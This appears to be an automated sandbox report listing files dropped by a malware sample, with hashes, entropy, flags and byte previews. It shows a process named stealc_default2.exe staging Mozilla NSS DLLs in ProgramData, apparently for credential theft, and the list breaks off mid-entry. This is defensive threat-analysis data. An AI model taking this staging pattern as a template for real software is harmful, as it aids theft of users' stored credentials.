SHA-512:	79B6DA0058604625884B33F553A0D82606E9EC243B23E8F63439405EBDC29185500912EB1A1E9712FF0FE899F1DE54A84FE7F5855E4DF5F801B656820484DE06
Malicious:	false
Preview:	2..... ...............X\...;...{......................0.z..........{..&....\|}.h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................Hz..&....\|....................B.&....\|}..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08095431755148716
Encrypted:	false
SSDEEP:	3:Lgml6Ye0WGuAJkhvekl1ToNllrekGltll/SPj:US6z/rxly3Je3l
MD5:	93CD13D612D39FA645DFB5BE8DAB8EBD
SHA1:	1894DB182480E20F708E6CFC94BD4FD218BD39E6
SHA-256:	A23B1A45FC30C88A22C25DFD1831DEF768B802C76BF532BC332F0182122524F0
SHA-512:	1A7C1874919A805878426E6EACD625BDD081C6FF404DCC00C6CE04B1E6905BC87C5BB07902A2F20AEDE3BCB8AC20AF2E313782C5E2CD2EF22E0AED4E10AEEA1B
Malicious:	false
Preview:	~phE.....................................;...{..&....\|}......{...............{.......{...XL......{....................B.&....\|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GOLD1234.exe_7b4c4061b629e8f4ec6f1e7f73fd23cef5651ad_3ea6409d_cf5b5803-d2d5-45d9-ba17-52b4f858e975\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6638015992105974
Encrypted:	false
SSDEEP:	96:kdF2FiGusHphDoI7Rh6tQXIDcQvc6QcEVcw3cE/mGH+HbHg/5hZAX/d5FMT2SlP0:sCue0BU/QjhzuiFsZ24IO8Sw
MD5:	DFD6EDA8B099B189B39F0B8C7A4F0437
SHA1:	5D7008A4B53DBD5A551C3091FEF77A714A147F3B
SHA-256:	06249BCD452C5E0A76745B506EA0BB3AF7485F3246FD0B235C026E0F1EEEE0B0
SHA-512:	D1D88BCC592174EE27606AEF269C1861288736754922B21407E0B1776695C22F9C7547B73DFEAC6EBBE10465B0F6FCCE6D90E10A771B9CB00CF7F150A0CFD5A5
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.9.3.8.5.9.4.2.9.1.8.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.9.3.8.6.0.6.3.2.3.0.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.5.b.5.8.0.3.-.d.2.d.5.-.4.5.d.9.-.b.a.1.7.-.5.2.b.4.f.8.5.8.e.9.7.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.6.4.6.2.1.d.-.3.4.f.2.-.4.a.9.5.-.9.6.8.6.-.6.f.3.d.1.8.3.1.f.7.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.O.L.D.1.2.3.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.d.0.-.0.0.0.1.-.0.0.1.4.-.1.7.5.f.-.2.1.4.5.d.c.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.c.5.a.6.8.a.e.c.0.8.7.7.1.0.a.f.c.b.b.8.6.a.2.9.9.4.1.3.8.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.3.4.5.7.e.5.a.8.b.4.1.e.d.6.f.4.2.b.3.1.9.7.c.f.f.5.3.c.8.e.c.5.0.b.4.d.b.2.!.G.O.L.D.1.2.3.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38B0.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	97768
Entropy (8bit):	3.0136477444991527
Encrypted:	false
SSDEEP:	1536:LcZxR/JX7jFXoHr8XgfnyuUo++EM69+18R+tD0hvL+051+F+r+3Wo9b7/pe3VPG:LcZxR/JX7jFXoHr8Xgfnyup++EM69+1T
MD5:	5AE699BCB1093C94F1CF5AB86C60C7E9
SHA1:	84E22BC8B4A2F5ECC38F40A19687E163B5A1F10E
SHA-256:	AB4CC7404DC3B4EDBA40265D6344F0D42C90AA312DFCCB7E296FC993062DC269
SHA-512:	CBDCE71DA1AF65FA04333B235B1A722D69E27491E0E10B54089F69D18F036B6400BDF0105E5A7FFCCB117B6F9BFC736F1875C533931CF84745809220F504C3A1
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B70.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.701020064271043
Encrypted:	false
SSDEEP:	96:TiZYWpu4UFoDYhY2WSDHuYEZVnt4iAzMC6j4wPimuuUa8TAMDnfI9Vz:2ZDXWMv3ma8TAMDnw9Vz
MD5:	CCDA6B9D55A491E3B21BC7F24D417109
SHA1:	13261314C57109E08675D07D0A45118107573196
SHA-256:	388840EA715E24C0F93FD6788D9447769650041306DE4E42BCEFB80673BEC090
SHA-512:	A790939606832CDCFB4AFFB20B49928924A83F8149F73BF58421CC7F94229211CEB3729B1E4378A895BAC10BD5E8021D267558C960BC8E62A6B9AD06CB2C76E4
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB10.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Nov 2 04:04:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	34980
Entropy (8bit):	1.6206228695183171
Encrypted:	false
SSDEEP:	96:5M8JmVmE7RXaZlMBci77ae3r2GSBe+Ja9jgzOf+QetmnJ2lj0l7WIkWIXpWIIPJQ:VwuZyqOqlFJOYO2DoJ2lj0ls6PDSaG
MD5:	D1B1A51AB26F541ED2B738BA51808439
SHA1:	BD5961DA59B373D1D5AF5C1EE1B41C9319A94887
SHA-256:	90197AA60EF62A7646599468899A31D89ABC6FABF2B7E9C7B669B0D2A241E19C
SHA-512:	7CF0CE8BB527F8B38EFEC25BBF89DFE55F3902D6F54D26A087B4E12CD30A04D755C451A116125997FA235D7678F221F62EBCEE2685C714183D134366AB38B613
Malicious:	false
Preview:	MDMP..a..... ........%g........................d...........................T.......8...........T................}......................................................................................................eJ..............GenuineIntel............T.............%g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREBAD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.69428356252694
Encrypted:	false
SSDEEP:	192:R6l7wVeJ826/fX6YDl6K5hHmgmfwpprD89bsssf9Em:R6lXJd6n6Yh6ihHmgmfwAs/fb
MD5:	9006F6A899380C98CCD276073896A3EB
SHA1:	5234E45DA4CF51103D2719F94C19A35B89D75362
SHA-256:	F4BA93B5BA1E083198C5FFCC6CB1639B08042B547A20AEA0ED3634AA9958A0D6
SHA-512:	956DC60A571ED3514CF80A17FF5C852DB94E0FCFC0E704BB2B739DCC0890461A6E72209BBEA91F9A3C9ECFFCE5C4CF837BB8EC12E7081C907D73890D34693FAE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECC8.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4710
Entropy (8bit):	4.482886777843033
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+Jg77aI9VqWpW8VYOYm8M4JeJFy+q8vRYBqjEpd:uIjf0I7fL7VeJBKGB+Epd
MD5:	22213D84356DDC4E404D4FD287DBF895
SHA1:	8F643EF651D17F6F3D980AC96166958EA65C349D
SHA-256:	C17C69417AF79FF726433E36CB3C6FA1E4035B56A9A78349C375D1AAE5789025
SHA-512:	4D41E25D169D46E2A0E42719F156D0669A073DF5CF40812767740BE45931D41F0741C3E238A615EB9F255D5B181370EE066F66D0A937E0E957DA556310B7ADC0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="569947" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED23.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84448
Entropy (8bit):	3.02931139752409
Encrypted:	false
SSDEEP:	1536:p2Tkf+y8PgNRliUd/YjvO+q+RtzF2TK++EM69+18R+tD0hvL+051+F+r+3WAlaPh:p2Tkf+y8PgNRliUd/YjvO+q+RtzF2W+f
MD5:	E2C64868D6090FC8E07CA6BB3F650B23
SHA1:	36CAC5014E94CE055E800C35EC8BB69EE884E1FA
SHA-256:	0FA1794AEF783F0B754C05F82D9B2B58855513C7FF4B4163E4501ECD1A660842
SHA-512:	EC54B00091881689FF9987757F98B6F1BD4FB089D134144784D9D21D18E2602CA599F5422C18B8DE7A6A920BE0337D8CDCBD72D227A3DF5F25F31FE2372A2670
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE1E.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.69431218516907
Encrypted:	false
SSDEEP:	96:TiZYWpsNN3olaXYZYgJWmHsYEZ9GtoitMp6owoPCsadT5MMYtxIuVc:2ZDyou+i1KsadTSMYtuuVc
MD5:	F329D48BC68B1548A20D6059BD3A02AB
SHA1:	D89ACE1F986AA21C6FB416B89C558F1828166666
SHA-256:	31437547BAB905549CCA8398E4C32567772977F089E31D8FFED557DE8FA85554
SHA-512:	730EAD0108D8597086C5C2232D5A5B57CE341882A3137A228733E657639B76EF2276823688AD6835521A77C95B6E948D5DB776C79FC0491BDFAEDF4B0C20E510
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\dz111it45.dat

Download File

Process:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Gl/l:Gl/l
MD5:	1E1FB75DC177819816E39388A7FF9B8D
SHA1:	876FF3C770B1862BC2256E120E514409566340CE
SHA-256:	FD2533D4779611196106221E05AE3C34AE99C8FA982B2D9CA7C9E47BA26DD780
SHA-512:	DEE2D8AD2137527B714E0A981EED0F4021430BEB2CB373A71DE10C46F65A2D7C3C8CD74122EE1C1A33762DED3C6348687543EBBE61B916F9BFE403A89EEBB091
Malicious:	false
Preview:	.%g....

C:\ProgramData\dz111rc45.dat

Download File

Process:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:Tln:p
MD5:	122D64C962F3323E5CF08FAC530E8D79
SHA1:	451CD837EE4D007D297B9EE67FCC2C6DD18A8536
SHA-256:	FA802ED35611D044B14E2D95CE6619C2051B5C0D6645459658E1D67FA0AF07C7
SHA-512:	BAF563DB564D0C14CF4DA50C27B4A1647AD8002A984CBBC3EEFCEDB3881C5352E4259E5D8E0138F0EBA610FB12585D766095D632FA6D22E5C6FCCE61FB7BAEA4
Malicious:	false
Preview:	>...

C:\ProgramData\dz111resa.dat

Download File

Process:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.9545817380615236
Encrypted:	false
SSDEEP:	3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
MD5:	98DDA7FC0B3E548B68DE836D333D1539
SHA1:	D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
SHA-256:	870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
SHA-512:	E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
Malicious:	false
Preview:	30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

C:\ProgramData\dz111resb.dat

Download File

Process:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	1.7095628900165245
Encrypted:	false
SSDEEP:	3:LDXdQSWBdMUE/:LLdQSGd
MD5:	4FFFD4D2A32CBF8FB78D521B4CC06680
SHA1:	3FA6EFA82F738740179A9388D8046619C7EBDF54
SHA-256:	EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
SHA-512:	130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
Malicious:	false
Preview:	dad6f9fa0c8327344d1aa24f183c3767................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: czxw4iVMHJ.exe, Detection: malicious, Browse Filename: JHPvqMzKbz.exe, Detection: malicious, Browse Filename: lkIbbNB9ba.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: o3QbCA4xLs.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: N#U0435wIns.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
